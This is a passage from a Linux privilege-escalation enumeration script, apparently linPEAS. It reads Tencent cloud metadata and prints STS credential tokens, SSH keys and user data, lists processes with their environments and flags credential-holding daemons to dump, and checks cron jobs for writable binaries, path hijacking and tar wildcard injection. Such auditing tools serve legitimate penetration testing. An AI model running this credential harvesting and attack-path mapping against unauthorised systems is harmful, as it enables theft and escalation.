mac_tencent in $(eval $tencent_req http://169.254.0.23/latest/meta-data/network/interfaces/macs/); do 5989 echo " Mac: $mac_tencent" 5990 echo " Primary IPv4: "$(eval $tencent_req http://169.254.0.23/latest/meta-data/network/interfaces/macs/$mac_tencent/primary-local-ipv4) 5991 echo " Mac public ips: "$(eval $tencent_req http://169.254.0.23/latest/meta-data/network/interfaces/macs/$mac_tencent/public-ipv4s) 5992 echo " Mac vpc id: "$(eval $tencent_req http://169.254.0.23/latest/meta-data/network/interfaces/macs/$mac_tencent/vpc-id) 5993 echo " Mac subnet id: "$(eval $tencent_req http://169.254.0.23/latest/meta-data/network/interfaces/macs/$mac_tencent/subnet-id) 5994 for lipv4 in $(eval $tencent_req http://169.254.0.23/latest/meta-data/network/interfaces/macs/$mac_tencent/local-ipv4s); do 5995 echo " Mac local ips: "$(eval $tencent_req http://169.254.0.23/latest/meta-data/network/interfaces/macs/$mac_tencent/local-ipv4s/$lipv4/local-ipv4) 5996 echo " Mac gateways: "$(eval $tencent_req http://169.254.0.23/latest/meta-data/network/interfaces/macs/$mac_tencent/local-ipv4s/$lipv4/gateway) 5997 echo " Mac public ips: "$(eval $tencent_req http://169.254.0.23/latest/meta-data/network/interfaces/macs/$mac_tencent/local-ipv4s/$lipv4/public-ipv4) 5998 echo " Mac public ips mode: "$(eval $tencent_req http://169.254.0.23/latest/meta-data/network/interfaces/macs/$mac_tencent/local-ipv4s/$lipv4/public-ipv4-mode) 5999 echo " Mac subnet mask: "$(eval $tencent_req http://169.254.0.23/latest/meta-data/network/interfaces/macs/$mac_tencent/local-ipv4s/$lipv4/subnet-mask) 6000 done 6001 echo "=======" 6002 done 6003 echo "" 6004 print_3title "Service account " "T1552.005,T1580" 6005 for sa_tencent in $(eval $tencent_req "http://169.254.0.23/latest/meta-data/cam/security-credentials/"); do 6006 echo " Name: $sa_tencent" 6007 echo " STS Token: "$(eval $tencent_req "http://169.254.0.23/latest/meta-data/cam/security-credentials/$sa_tencent") 6008 echo " ==============" 6009 done 6010 echo "" 6011 print_3title "Possbile admin ssh Public keys" "T1552.005,T1580" 6012 for key_tencent in $(eval $tencent_req "http://169.254.0.23/latest/meta-data/public-keys/"); do 6013 echo " Name: $key_tencent" 6014 echo " Key: "$(eval $tencent_req "http://169.254.0.23/latest/meta-data/public-keys/${key_tencent}openssh-key") 6015 echo " ==============" 6016 done 6017 echo "" 6018 print_3title "User Data" "T1552.005,T1580" 6019 eval $tencent_req http://169.254.0.23/latest/user-data; echo "" 6020 fi 6021 6022 fi 6023 6024 fi 6025 6026 fi 6027 echo '' 6028 echo '' 6029 if [ "$WAIT" ]; then echo "Press enter to continue"; read "asd"; fi 6030 6031 if echo $CHECKS | grep -q procs_crons_timers_srvcs_sockets; then 6032 if check_mitre_filter "T1543.002,T1007,T1559,T1571,T1049,T1559.001,T1021.004,T1053.003,T1083,T1057,T1003.007,T1574,T1554,T1134.004,T1543.001"; then 6033 print_title "Processes, Crons, Timers, Services and Sockets" 6034 if check_mitre_filter "T1057"; then 6035 if ! [ "$SEARCH_IN_FOLDER" ]; then 6036 print_2title "Running processes (cleaned)" "T1057" 6037 if [ "$NOUSEPS" ]; then 6038 printf ${BLUE}"[i]$GREEN Looks like ps is not finding processes, going to read from /proc/ and not going to monitor 1min of processes\n"$NC 6039 fi 6040 print_info "Check weird & unexpected processes run by root: https://book.hacktricks.wiki/en/linux-hardening/privilege-escalation/index.html#processes" 6041 if [ -f "/etc/fstab" ] && cat /etc/fstab | grep -q "hidepid=2"; then 6042 echo "Looks like /etc/fstab has hidepid=2, so ps will not show processes of other users" 6043 fi 6044 # Get current process environment variables 6045 if [ -r "/proc/self/environ" ]; then 6046 current_env_vars=$(cat /proc/self/environ 2>/dev/null | tr '\0' '\n' | sort) 6047 else 6048 current_env_vars=$(env 2>/dev/null | sort) 6049 fi 6050 # Get current process mounts 6051 if [ -r "/proc/self/mountinfo" ]; then 6052 current_mounts=$(cat /proc/self/mountinfo 2>/dev/null | sort) 6053 else 6054 current_mounts=$(mount 2>/dev/null | sort) 6055 fi 6056 # Function to check for unusual environment variables 6057 check_env_vars() { 6058 local pid="$1" 6059 local proc_user="$2" 6060 local proc_cmd="$3" 6061 local findings="" 6062 # Skip if we can't read the environment 6063 [ ! -r "/proc/$pid/environ" ] && return 6064 # Get process environment variables 6065 proc_env_vars=$(cat "/proc/$pid/environ" 2>/dev/null | tr '\0' '\n' | sort) 6066 [ -z "$proc_env_vars" ] && return 6067 # Find environment variables that the target process has but we don't 6068 if [ -n "$current_env_vars" ]; then 6069 echo "$proc_env_vars" | while read -r var; do 6070 if [ -n "$var" ]; then 6071 # Escape special regex characters in var 6072 escaped_var=$(echo "$var" | sed 's/[][^$.*+?(){}|]/\\&/g') 6073 if ! echo "$current_env_vars" | grep -q "^$escaped_var$"; then 6074 if [ -z "$findings" ]; then 6075 findings="Has additional environment variables:" 6076 fi 6077 findings="$findings\n └─ $var" 6078 fi 6079 fi 6080 done 6081 else 6082 # If we can't get current env vars, just show all process env vars 6083 findings="Has environment variables:" 6084 echo "$proc_env_vars" | while read -r var; do 6085 if [ -n "$var" ]; then 6086 findings="$findings\n └─ $var" 6087 fi 6088 done 6089 fi 6090 # Return findings if any 6091 if [ -n "$findings" ]; then 6092 echo "$findings" 6093 fi 6094 } 6095 # Function to check for unusual security contexts 6096 check_security_context() { 6097 local pid="$1" 6098 local proc_user="$2" 6099 local proc_cmd="$3" 6100 local findings="" 6101 # Check SELinux context 6102 if [ -r "/proc/$pid/attr/current" ]; then 6103 selinux_ctx=$(cat "/proc/$pid/attr/current" 2>/dev/null) 6104 if [ -n "$selinux_ctx" ] && [ "$selinux_ctx" != "unconfined" ]; then 6105 findings="SELinux context: $selinux_ctx" 6106 fi 6107 fi 6108 # Check AppArmor profile 6109 if [ -r "/proc/$pid/attr/apparmor/current" ]; then 6110 apparmor_profile=$(cat "/proc/$pid/attr/apparmor/current" 2>/dev/null) 6111 if [ -n "$apparmor_profile" ] && [ "$apparmor_profile" != "unconfined" ]; then 6112 if [ -n "$findings" ]; then 6113 findings="$findings\n └─ AppArmor profile: $apparmor_profile" 6114 else 6115 findings="AppArmor profile: $apparmor_profile" 6116 fi 6117 fi 6118 fi 6119 # Return findings if any 6120 if [ -n "$findings" ]; then 6121 echo "$findings" 6122 fi 6123 } 6124 # Function to check for unusual mount namespaces 6125 check_mount_namespace() { 6126 local pid="$1" 6127 local proc_user="$2" 6128 local proc_cmd="$3" 6129 local findings="" 6130 # Skip if we can't read the mountinfo 6131 [ ! -r "/proc/$pid/mountinfo" ] && return 6132 # Get process mounts 6133 proc_mounts=$(cat "/proc/$pid/mountinfo" 2>/dev/null | sort) 6134 [ -z "$proc_mounts" ] && return 6135 # Find mounts that the target process has but we don't 6136 if [ -n "$current_mounts" ]; then 6137 echo "$proc_mounts" | while read -r mount; do 6138 if [ -n "$mount" ] && ! echo "$current_mounts" | grep -q "^$mount$"; then 6139 mount_point=$(echo "$mount" | sed "s,.* - \(.*\),\1,") 6140 if [ -z "$findings" ]; then 6141 findings="Has additional mounts:" 6142 fi 6143 findings="$findings\n └─ $mount_point" 6144 fi 6145 done 6146 else 6147 # If we can't get current mounts, just show all process mounts 6148 findings="Has mounts:" 6149 echo "$proc_mounts" | while read -r mount; do 6150 if [ -n "$mount" ]; then 6151 mount_point=$(echo "$mount" | sed "s,.* - \(.*\),\1,") 6152 findings="$findings\n └─ $mount_point" 6153 fi 6154 done 6155 fi 6156 # Return findings if any 6157 if [ -n "$findings" ]; then 6158 echo "$findings" 6159 fi 6160 } 6161 # Function to check for unusual file descriptors 6162 check_file_descriptors() { 6163 local pid="$1" 6164 local proc_user="$2" 6165 local proc_cmd="$3" 6166 local findings="" 6167 # Skip if we can't read the file descriptors 6168 [ ! -r "/proc/$pid/fd" ] && return 6169 # Check for interesting file descriptors 6170 for fd in /proc/$pid/fd/*; do 6171 # Skip if fd doesn't exist or we can't access it 6172 [ ! -e "$fd" ] && continue 6173 # Get fd target 6174 fd_target=$(readlink "$fd" 2>/dev/null) 6175 [ -z "$fd_target" ] && continue 6176 # Skip if target doesn't exist 6177 [ ! -e "$fd_target" ] && continue 6178 # Check if we can access the FD but not the target file 6179 if [ -r "$fd" ] && [ ! -r "$fd_target" ]; then 6180 if [ -z "$findings" ]; then 6181 findings="Readable FD to unreadable file: $fd -> $fd_target" 6182 else 6183 findings="$findings\n └─ Readable FD to unreadable file: $fd -> $fd_target" 6184 fi 6185 fi 6186 if [ -w "$fd" ] && [ ! -w "$fd_target" ]; then 6187 if [ -z "$findings" ]; then 6188 findings="Writable FD to unwritable file: $fd -> $fd_target" 6189 else 6190 findings="$findings\n └─ Writable FD to unwritable file: $fd -> $fd_target" 6191 fi 6192 fi 6193 done 6194 # Check for unusual number of file descriptors 6195 fd_count=$(ls -1 "/proc/$pid/fd" 2>/dev/null | wc -l) 6196 [ -z "$fd_count" ] && return 6197 # If process has more than 100 file descriptors, it might be interesting 6198 if [ "$fd_count" -gt 100 ]; then 6199 if [ -z "$findings" ]; then 6200 findings="Unusual number of FDs: $fd_count" 6201 else 6202 findings="$findings\n └─ Unusual number of FDs: $fd_count" 6203 fi 6204 fi 6205 # Return findings if any 6206 if [ -n "$findings" ]; then 6207 echo "$findings" 6208 fi 6209 } 6210 if [ "$NOUSEPS" ]; then 6211 print_ps | grep -v 'sed-Es' | sed -${E} "s,$Wfolders,${SED_RED},g" | sed -${E} "s,$sh_usrs,${SED_LIGHT_CYAN}," | sed -${E} "s,$nosh_usrs,${SED_BLUE}," | sed -${E} "s,$rootcommon,${SED_GREEN}," | sed -${E} "s,$knw_usrs,${SED_GREEN}," | sed "s,$USER,${SED_LIGHT_MAGENTA}," | sed "s,root,${SED_RED}," | sed -${E} "s,$processesVB,${SED_RED_YELLOW},g" | sed "s,$processesB,${SED_RED}," | sed -${E} "s,$processesDump,${SED_RED}," 6212 pslist=$(print_ps) 6213 else 6214 (ps fauxwww || ps auxwww | sort ) 2>/dev/null | grep -v "\[" | grep -v "%CPU" | while read psline; do 6215 echo "$psline" | sed -${E} "s,$Wfolders,${SED_RED},g" | sed -${E} "s,$sh_usrs,${SED_LIGHT_CYAN}," | sed -${E} "s,$nosh_usrs,${SED_BLUE}," | sed -${E} "s,$rootcommon,${SED_GREEN}," | sed -${E} "s,$knw_usrs,${SED_GREEN}," | sed "s,$USER,${SED_LIGHT_MAGENTA}," | sed "s,root,${SED_RED}," | sed -${E} "s,$processesVB,${SED_RED_YELLOW},g" | sed "s,$processesB,${SED_RED}," | sed -${E} "s,$processesDump,${SED_RED}," 6216 if [ "$(command -v capsh || echo -n '')" ] && ! echo "$psline" | grep -q "root"; then 6217 cpid=$(echo "$psline" | awk '{print $2}') 6218 caphex=0x"$(cat /proc/$cpid/status 2> /dev/null | grep CapEff | awk '{print $2}')" 6219 if [ "$caphex" ] && [ "$caphex" != "0x" ] && echo "$caphex" | grep -qv '0x0000000000000000'; then 6220 printf " └─(${DG}Caps${NC}) "; capsh --decode=$caphex 2>/dev/null | grep -v "WARNING:" | sed -${E} "s,$capsB,${SED_RED},g" 6221 fi 6222 fi 6223 done 6224 pslist=$(ps auxwww) 6225 echo "" 6226 fi 6227 # Additional checks for each process 6228 print_2title "Processes with unusual configurations" "T1057" 6229 for pid in $(find /proc -maxdepth 1 -regex '/proc/[0-9]+' -printf "%f\n" 2>/dev/null); do 6230 # Skip if process doesn't exist or we can't access it 6231 [ ! -d "/proc/$pid" ] && continue 6232 # Get process user and command 6233 proc_user=$(stat -c '%U' "/proc/$pid" 2>/dev/null) 6234 proc_cmd=$(cat "/proc/$pid/cmdline" 2>/dev/null | tr '\0' ' ' | head -c 100) 6235 [ -z "$proc_user" ] || [ -z "$proc_cmd" ] && continue 6236 # Run all checks and collect findings 6237 sec_findings=$(check_security_context "$pid" "$proc_user" "$proc_cmd") 6238 mount_findings=$(check_mount_namespace "$pid" "$proc_user" "$proc_cmd") 6239 fd_findings=$(check_file_descriptors "$pid" "$proc_user" "$proc_cmd") 6240 env_findings=$(check_env_vars "$pid" "$proc_user" "$proc_cmd") 6241 # If any findings exist, print process info and findings 6242 if [ -n "$env_findings" ] || [ -n "$sec_findings" ] || [ -n "$mount_findings" ] || [ -n "$fd_findings" ]; then 6243 echo "Process $pid ($proc_user) - $proc_cmd" 6244 [ -n "$env_findings" ] && echo "$env_findings" 6245 [ -n "$sec_findings" ] && echo "$sec_findings" 6246 [ -n "$mount_findings" ] && echo "$mount_findings" 6247 [ -n "$fd_findings" ] && echo "$fd_findings" 6248 echo "" 6249 fi 6250 done 6251 echo "" 6252 fi 6253 6254 fi 6255 6256 if check_mitre_filter "T1003.007"; then 6257 if ! [ "$SEARCH_IN_FOLDER" ]; then 6258 print_2title "Processes with credentials in memory (root req)" "T1003.007" 6259 print_info "https://book.hacktricks.wiki/en/linux-hardening/privilege-escalation/index.html#credentials-from-process-memory" 6260 # Common credential-storing processes 6261 cred_processes="gdm-password gnome-keyring-daemon lightdm vsftpd apache2 sshd: mysql postgres redis-server mongod memcached elasticsearch jenkins tomcat nginx php-fpm supervisord vncserver xrdp teamviewer" 6262 # Check for credential-storing processes 6263 for proc in $cred_processes; do 6264 if echo "$pslist" | grep -q "$proc"; then 6265 echo "$proc process found (dump creds from memory as root)" | sed "s,$proc,${SED_RED}," 6266 else 6267 echo_not_found "$proc" 6268 fi 6269 done 6270 # Check for processes with open handles to credential files 6271 echo "" 6272 print_2title "Opened Files by processes" "T1003.007" 6273 for pid in $(find /proc -maxdepth 1 -regex '/proc/[0-9]+' -printf "%f\n" 2>/dev/null); do 6274 # Skip if process doesn't exist or we can't access it 6275 [ ! -d "/proc/$pid" ] && continue 6276 [ ! -r "/proc/$pid/fd" ] && continue 6277 # Get process user and command 6278 proc_user=$(stat -c '%U' "/proc/$pid" 2>/dev/null) 6279 proc_cmd=$(cat "/proc/$pid/cmdline" 2>/dev/null | tr '\0' ' ' | head -c 100) 6280 [ -z "$proc_user" ] || [ -z "$proc_cmd" ] && continue 6281 # Skip processes that start with "sed " or contain "linpeas.sh" 6282 echo "$proc_cmd" | grep -q "^sed " && continue 6283 echo "$proc_cmd" | grep -q "linpeas.sh" && continue 6284 # Variable to store unique files for this process 6285 seen_files="" 6286 found_cred_files="" 6287 # Check for open credential files 6288 for fd in /proc/$pid/fd/*; do 6289 [ ! -e "$fd" ] && continue 6290 fd_target=$(readlink "$fd" 2>/dev/null) 6291 [ -z "$fd_target" ] && continue 6292 [ "$fd_target" = "/dev/null" ] && continue 6293 echo "$fd_target" | grep -q "^socket:" && continue 6294 echo "$fd_target" | grep -q "^anon_inode:" && continue 6295 # Only add if not already seen (using case to check) 6296 case " $seen_files " in 6297 *" $fd_target "*) continue ;; 6298 *) 6299 seen_files="$seen_files $fd_target" 6300 if [ -z "$found_cred_files" ]; then 6301 echo "Process $pid ($proc_user) - $proc_cmd" 6302 echo " └─ Has open files:" 6303 found_cred_files="yes" 6304 fi 6305 echo " └─ $fd_target" 6306 ;; 6307 esac 6308 done 6309 done | sed -${E} "s,\.(pem|key|cred|db|sqlite|conf|cnf|ini|env|secret|token|auth|passwd|shadow)$,\1${SED_RED},g" | sed -${E} "s,$sh_usrs,${SED_LIGHT_CYAN}," | sed -${E} "s,$nosh_usrs,${SED_BLUE}," | sed -${E} "s,$rootcommon,${SED_GREEN}," | sed -${E} "s,$knw_usrs,${SED_GREEN}," | sed "s,$USER,${SED_LIGHT_MAGENTA}," | sed "s,root,${SED_RED}," | sed -${E} "s,$processesVB,${SED_RED_YELLOW},g" | sed "s,$processesB,${SED_RED}," | sed -${E} "s,$processesDump,${SED_RED}," 6310 # Check for processes with memory-mapped files that might contain credentials 6311 echo "" 6312 print_2title "Processes with memory-mapped credential files" "T1003.007" 6313 for pid in $(find /proc -maxdepth 1 -regex '/proc/[0-9]+' -printf "%f\n" 2>/dev/null); do 6314 # Skip if process doesn't exist or we can't access it 6315 [ ! -d "/proc/$pid" ] && continue 6316 [ ! -r "/proc/$pid/maps" ] && continue 6317 # Get process user and command 6318 proc_user=$(stat -c '%U' "/proc/$pid" 2>/dev/null) 6319 proc_cmd=$(cat "/proc/$pid/cmdline" 2>/dev/null | tr '\0' ' ' | head -c 100) 6320 [ -z "$proc_user" ] || [ -z "$proc_cmd" ] && continue 6321 # Check for memory-mapped files that might contain credentials 6322 cred_files=$(grep -E '\.(pem|key|cred|db|sqlite|conf|cnf|ini|env|secret|token|auth|passwd|shadow)$' "/proc/$pid/maps" 2>/dev/null) 6323 if [ -n "$cred_files" ]; then 6324 echo "Process $pid ($proc_user) - $proc_cmd" 6325 echo " └─ Has memory-mapped credential files:" 6326 echo "$cred_files" | while read -r line; do 6327 filename=$(echo "$line" | sed "s,.*/\(.*\),\1,") 6328 echo " └─ $filename" 6329 done 6330 fi 6331 done 6332 echo "" 6333 fi 6334 6335 fi 6336 6337 if check_mitre_filter "T1574,T1554"; then 6338 if ! [ "$SEARCH_IN_FOLDER" ]; then 6339 if [ "$NOUSEPS" ]; then 6340 print_2title "Binary processes permissions (non 'root root' and not belonging to current user)" "T1574,T1554" 6341 print_info "https://book.hacktricks.wiki/en/linux-hardening/privilege-escalation/index.html#processes" 6342 # Get list of writable binaries 6343 binW="" 6344 for pid in $(find /proc -maxdepth 1 -regex '/proc/[0-9]+' -printf "%f\n" 2>/dev/null); do 6345 # Skip if process doesn't exist or we can't access it 6346 [ ! -r "/proc/$pid/exe" ] && continue 6347 # Get binary path 6348 bpath=$(readlink "/proc/$pid/exe" 2>/dev/null) 6349 [ -z "$bpath" ] && continue 6350 # Check if binary is writable 6351 if [ -w "$bpath" ]; then 6352 if [ -z "$binW" ]; then 6353 binW="$bpath" 6354 else 6355 binW="$binW|$bpath" 6356 fi 6357 fi 6358 done 6359 # Get and display binary permissions 6360 for pid in $(find /proc -maxdepth 1 -regex '/proc/[0-9]+' -printf "%f\n" 2>/dev/null); do 6361 # Skip if process doesn't exist or we can't access it 6362 [ ! -r "/proc/$pid/exe" ] && continue 6363 # Get binary path 6364 bpath=$(readlink "/proc/$pid/exe" 2>/dev/null) 6365 [ -z "$bpath" ] && continue 6366 # Display binary permissions if file exists 6367 if [ -e "$bpath" ]; then 6368 ls -la "$bpath" 2>/dev/null 6369 fi 6370 done | grep -Ev "\sroot\s+root" | grep -v " $USER " | sed -${E} "s,$Wfolders,${SED_RED_YELLOW},g" | sed -${E} "s,$binW,${SED_RED_YELLOW},g" | sed -${E} "s,$sh_usrs,${SED_RED}," | sed -${E} "s,$nosh_usrs,${SED_BLUE}," | sed -${E} "s,$knw_usrs,${SED_GREEN}," | sed "s,$USER,${SED_RED}," | sed "s,root,${SED_GREEN}," 6371 echo "" 6372 fi 6373 fi 6374 6375 fi 6376 6377 if check_mitre_filter "T1134.004"; then 6378 if ! [ "$SEARCH_IN_FOLDER" ] && ! [ "$NOUSEPS" ]; then 6379 print_2title "Processes whose PPID belongs to a different user (not root)" "T1134.004" 6380 print_info "You will know if a user can somehow spawn processes as a different user" 6381 # Function to get user by PID using /proc 6382 get_user_by_pid() { 6383 if [ -r "/proc/$1/status" ]; then 6384 grep "^Uid:" "/proc/$1/status" 2>/dev/null | awk '{print $2}' 6385 fi 6386 } 6387 # Function to get username by UID 6388 get_username_by_uid() { 6389 if [ -r "/etc/passwd" ]; then 6390 grep "^[^:]*:[^:]*:$1:" "/etc/passwd" 2>/dev/null | cut -d: -f1 6391 fi 6392 } 6393 # Find processes with PPID and user info, then filter those where PPID's user is different from the process's user 6394 for pid in $(find /proc -maxdepth 1 -regex '/proc/[0-9]+' -printf "%f\n" 2>/dev/null); do 6395 # Skip if process doesn't exist or we can't access it 6396 [ ! -r "/proc/$pid/status" ] && continue 6397 # Get process user 6398 user_uid=$(get_user_by_pid "$pid") 6399 [ -z "$user_uid" ] && continue 6400 user=$(get_username_by_uid "$user_uid") 6401 [ -z "$user" ] && continue 6402 # Get PPID 6403 ppid=$(grep "^PPid:" "/proc/$pid/status" 2>/dev/null | awk '{print $2}') 6404 [ -z "$ppid" ] || [ "$ppid" = "0" ] && continue 6405 # Get PPID user 6406 ppid_uid=$(get_user_by_pid "$ppid") 6407 [ -z "$ppid_uid" ] && continue 6408 ppid_user=$(get_username_by_uid "$ppid_uid") 6409 [ -z "$ppid_user" ] && continue 6410 # Check if users are different and PPID user is not root 6411 if [ "$user" != "$ppid_user" ] && [ "$ppid_user" != "root" ]; then 6412 echo "Proc $pid with ppid $ppid is run by user $user but the ppid user is $ppid_user" | sed -${E} "s,$sh_usrs,${SED_LIGHT_CYAN}," | sed "s,$USER,${SED_LIGHT_MAGENTA}," | sed -${E} "s,$nosh_usrs,${SED_BLUE}," | sed "s,root,${SED_RED}," 6413 fi 6414 done 6415 echo "" 6416 fi 6417 6418 fi 6419 6420 if check_mitre_filter "T1083"; then 6421 if ! [ "$SEARCH_IN_FOLDER" ]; then 6422 if ! [ "$IAMROOT" ]; then 6423 print_2title "Files opened by processes belonging to other users" "T1083" 6424 print_info "This is usually empty because of the lack of privileges to read other user processes information" 6425 # Function to get username by UID 6426 get_username_by_uid() { 6427 if [ -r "/etc/passwd" ]; then 6428 grep "^[^:]*:[^:]*:$1:" "/etc/passwd" 2>/dev/null | cut -d: -f1 6429 fi 6430 } 6431 # Check each process 6432 for pid in $(find /proc -maxdepth 1 -regex '/proc/[0-9]+' -printf "%f\n" 2>/dev/null); do 6433 # Skip if process doesn't exist or we can't access it 6434 [ ! -r "/proc/$pid/status" ] && continue 6435 [ ! -r "/proc/$pid/fd" ] && continue 6436 # Get process user 6437 user_uid=$(grep "^Uid:" "/proc/$pid/status" 2>/dev/null | awk '{print $2}') 6438 [ -z "$user_uid" ] && continue 6439 user=$(get_username_by_uid "$user_uid") 6440 [ -z "$user" ] && continue 6441 # Skip if process belongs to current user 6442 [ "$user" = "$USER" ] && continue 6443 # Get process command 6444 cmd=$(cat "/proc/$pid/cmdline" 2>/dev/null | tr '\0' ' ' | head -c 100) 6445 [ -z "$cmd" ] && continue 6446 # Check file descriptors 6447 for fd in /proc/$pid/fd/*; do 6448 [ ! -e "$fd" ] && continue 6449 fd_target=$(readlink "$fd" 2>/dev/null) 6450 [ -z "$fd_target" ] && continue 6451 # Skip if target doesn't exist or is a special file 6452 [ ! -e "$fd_target" ] && continue 6453 case "$fd_target" in 6454 /dev/*|/proc/*|/sys/*) continue ;; 6455 esac 6456 echo "Process $pid ($user) - $cmd" 6457 echo " └─ Has open file: $fd_target" | sed -${E} "s,$sh_usrs,${SED_LIGHT_CYAN}," | sed "s,$USER,${SED_LIGHT_MAGENTA}," | sed -${E} "s,$nosh_usrs,${SED_BLUE}," | sed "s,root,${SED_RED}," 6458 done 6459 done 6460 echo "" 6461 fi 6462 fi 6463 6464 fi 6465 6466 if check_mitre_filter "T1057"; then 6467 if ! [ "$SEARCH_IN_FOLDER" ]; then 6468 if ! [ "$FAST" ] && ! [ "$SUPERFAST" ]; then 6469 print_2title "Different processes executed during 1 min (interesting is low number of repetitions)" "T1057" 6470 print_info "https://book.hacktricks.wiki/en/linux-hardening/privilege-escalation/index.html#frequent-cron-jobs" 6471 temp_file=$(mktemp) 6472 if [ "$(ps -e -o user,command 2>/dev/null)" ]; then 6473 for i in $(seq 1 1210); do 6474 ps -e -o user,command >> "$temp_file" 2>/dev/null; sleep 0.05; 6475 done; 6476 sort "$temp_file" 2>/dev/null | uniq -c | grep -v "\[" | sed '/^.\{200\}./d' | sort -r -n | grep -E -v "\s*[1-9][0-9][0-9][0-9]" | sed -${E} "s,$Wfolders,${SED_RED},g" | sed -${E} "s,$sh_usrs,${SED_LIGHT_CYAN}," | sed "s,$USER,${SED_LIGHT_MAGENTA}," | sed -${E} "s,$nosh_usrs,${SED_BLUE}," | sed "s,root,${SED_RED},"; 6477 rm "$temp_file"; 6478 fi 6479 echo "" 6480 fi 6481 fi 6482 6483 fi 6484 6485 if check_mitre_filter "T1053.003"; then 6486 if ! [ "$SEARCH_IN_FOLDER" ]; then 6487 print_2title "Check for vulnerable cron jobs" "T1053.003" 6488 print_info "https://book.hacktricks.wiki/en/linux-hardening/privilege-escalation/index.html#scheduledcron-jobs" 6489 print_3title "Cron jobs list" "T1053.003" 6490 command -v crontab 2>/dev/null || echo_not_found "crontab" 6491 crontab -l 2>/dev/null | tr -d "\r" | sed -${E} "s,$Wfolders,${SED_RED_YELLOW},g" | sed -${E} "s,$sh_usrs,${SED_LIGHT_CYAN}," | sed "s,$USER,${SED_LIGHT_MAGENTA}," | sed -${E} "s,$nosh_usrs,${SED_BLUE}," | sed "s,root,${SED_RED}," 6492 command -v incrontab 2>/dev/null || echo_not_found "incrontab" 6493 incrontab -l 2>/dev/null 6494 ls -alR /etc/cron* /var/spool/cron/crontabs /var/spool/anacron 2>/dev/null | sed -${E} "s,$cronjobsG,${SED_GREEN},g" | sed "s,$cronjobsB,${SED_RED},g" 6495 cat /etc/cron* /etc/at* /etc/anacrontab /var/spool/cron/crontabs/* /etc/incron.d/* /var/spool/incron/* 2>/dev/null | tr -d "\r" | grep -v "^#" | sed -${E} "s,$Wfolders,${SED_RED_YELLOW},g" | sed -${E} "s,$sh_usrs,${SED_LIGHT_CYAN}," | sed "s,$USER,${SED_LIGHT_MAGENTA}," | sed -${E} "s,$nosh_usrs,${SED_BLUE}," | sed "s,root,${SED_RED}," 6496 grep -Hn '^PATH=' /etc/crontab /etc/cron.d/* 2>/dev/null | sed -${E} "s,$Wfolders,${SED_RED_YELLOW},g" 6497 grep -RInE 'pg_basebackup|run-parts|crontab-ui' /etc/crontab /etc/cron.d /etc/anacrontab /var/spool/cron/crontabs /etc/incron.d /var/spool/incron 2>/dev/null | sed -${E} "s,$cronjobsB,${SED_RED},g" | sed -${E} "s,$Wfolders,${SED_RED_YELLOW},g" 6498 crontab -l -u "$USER" 2>/dev/null | tr -d "\r" 6499 ls -lR /usr/lib/cron/tabs/ /private/var/at/jobs /var/at/tabs/ /etc/periodic/ 2>/dev/null | sed -${E} "s,$cronjobsG,${SED_GREEN},g" | sed "s,$cronjobsB,${SED_RED},g" #MacOS paths 6500 atq 2>/dev/null 6501 echo "" 6502 print_3title "Cron files with hidden carriage returns" "T1053.003" 6503 grep -IRl $'\r' /etc/crontab /etc/cron.d /var/spool/cron/crontabs 2>/dev/null | while read -r file; do 6504 [ -n "$file" ] || continue 6505 echo "$file" | sed -${E} "s,.*,${SED_RED},g" 6506 sed -n 'l' "$file" 2>/dev/null | head -n 20 6507 done 6508 echo "" 6509 print_3title "Checking for specific cron jobs vulnerabilities" "T1053.003" 6510 # Function to check if a binary is writable and executable 6511 check_binary_perms() { 6512 local bin="$1" 6513 [ -z "$bin" ] && return 6514 # Skip if binary doesn't exist 6515 [ ! -e "$bin" ] && return 6516 # Check if it's a regular file 6517 [ ! -f "$bin" ] && return 6518 # Check if it's writable and executable 6519 if [ -w "$bin" ]; then 6520 echo "Writable binary: $bin" 6521 ls -l "$bin" 2>/dev/null 6522 fi 6523 } 6524 # Function to extract binary path from command 6525 get_binary_path() { 6526 local cmd="$1" 6527 local bin="" 6528 # Try to get the first word of the command 6529 bin=$(echo "$cmd" | awk '{print $1}') 6530 [ -z "$bin" ] && return 6531 # If it's an absolute path, use it directly 6532 if [ "$(echo "$bin" | cut -c1)" = "/" ]; then 6533 echo "$bin" 6534 return 6535 fi 6536 # If it's a relative path, try to resolve it 6537 if [ -e "$bin" ]; then 6538 echo "$(pwd)/$bin" 6539 return 6540 fi 6541 # Try to find it in PATH 6542 for path in $(echo "$PATH" | tr ':' ' '); do 6543 if [ -x "$path/$bin" ]; then 6544 echo "$path/$bin" 6545 return 6546 fi 6547 done 6548 } 6549 # Function to check for privilege escalation vectors in a command 6550 check_privesc_vectors() { 6551 local cmd="$1" 6552 local file="$2" 6553 local findings="" 6554 local bin="" 6555 # Skip common false positives (mail commands, shell conditionals, variable assignments) 6556 if echo "$cmd" | grep -qE '^(mail|echo|then|else|fi|if|for|while|do|done|case|esac|exit|return|break|continue|:|\[|test|\[\[|\]\]|true|false|source|\.|cd|pwd|export|unset|readonly|local|declare|typeset|alias|unalias|set|unset|shift|wait|trap|umask|ulimit|exec|eval|command|builtin|let|read|printf|^[[:space:]]*[A-Za-z0-9_]+[[:space:]]*[=:])'; then 6557 return 6558 fi 6559 # Get the binary path 6560 bin=$(get_binary_path "$cmd") 6561 if [ -n "$bin" ]; then 6562 check_binary_perms "$bin" 6563 fi 6564 # Check for wildcard injection vectors 6565 # Attack: Using wildcards in tar/chmod/chown to execute arbitrary commands 6566 # Example: tar cf archive.tar * (where * expands to --checkpoint=1 --checkpoint-action=exec=sh) 6567 if echo "$cmd" | grep -qE '\*'; then 6568 findings="${findings}POTENTIAL_WILDCARD_INJECTION: Command uses wildcards with potentially exploitable command\n" 6569 fi 6570 # Check for path hijacking vectors 6571 # Attack: Using relative paths or commands without full path that can be hijacked 6572 # Example: script.sh instead of /usr/bin/script.sh 6573 if echo "$cmd" | grep -qE '^[[:space:]]*[^/][^[:space:]]*[[:space:]]'; then 6574 # Skip common false positives like shell builtins, control structures, and variable assignments 6575 # Also skip test commands ([ ]), logical operators (&& ||), and complex shell constructs 6576 if ! echo "$cmd" | grep -qE '^[[:space:]]*(cd|\.|source|\./|if|then|else|fi|for|while|do|done|case|esac|exit|return|break|continue|:|\[[[:space:]]|test|\[\[|\]\]|true|false|export|unset|readonly|local|declare|typeset|alias|unalias|set|unset|shift|wait|trap|umask|ulimit|exec|eval|command|builtin|let|read|printf|[A-Za-z0-9_]+[[:space:]]*[=:]|&&|\|\||;|\(|\)|\{|\})'; then 6577 findings="${findings}PATH_HIJACKING: Command uses relative path\n" 6578 fi 6579 fi 6580 # Check for command injection vectors 6581 